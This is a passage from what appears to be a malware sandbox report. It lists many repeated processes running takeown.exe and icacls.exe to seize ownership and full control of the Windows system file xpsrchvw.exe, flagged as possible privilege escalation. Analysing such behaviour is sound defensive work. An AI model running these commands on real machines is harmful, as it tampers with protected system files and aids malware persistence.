  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2184
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:2804
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:792
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1788
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2452
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2740
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2304
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1200
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1344
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2512
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1844
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:1636
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1704
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1740
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2500
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2448
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1596
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2208
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:540
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1500
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1760
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2636
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:1384
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:300
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2620
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1468
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2976
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1092
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2504
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2124
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1336
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2344
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1072
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1304
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1652
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:1132
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1512
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1776
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:832
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2884
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2348
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1692
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1748
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2068
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2732
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:1932
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2824
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:1296
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2388
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3040
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2204
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2120
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:2320
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:660
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:896
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2012
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2992
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2532
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:2400
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1552
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2084
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2276
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2984
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:2164
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2004
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:872
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2088
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2980
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2032
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1232
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1560
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:364
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1568
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:2000
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:744
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1556
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2560
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:1688
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2056
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2680
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:2216
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2696
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2584
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:1532
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2792
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:2228
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2608
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2436
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2256
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:308
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1928
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2244
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2468
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:2644
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:440
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2724
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3076
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:3084
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3092
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3100
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3108
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3116
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3124
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:3132
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3148
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3156
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3172
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3180
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3188
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3204
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3220
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3236
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3252
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3268
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3276
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3292
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3300
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3324
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3348
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3372
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3380
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3404
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3420
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3428
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3436
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3452
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3460
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3468
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3484
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3500
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3516
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3532
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3540
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3556
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3572
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3584
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3596
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3612
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3636
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3644
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3652
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3672
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3684
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3692
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3716
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:3740
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3732
- C:\Windows\System32\takeown.exe
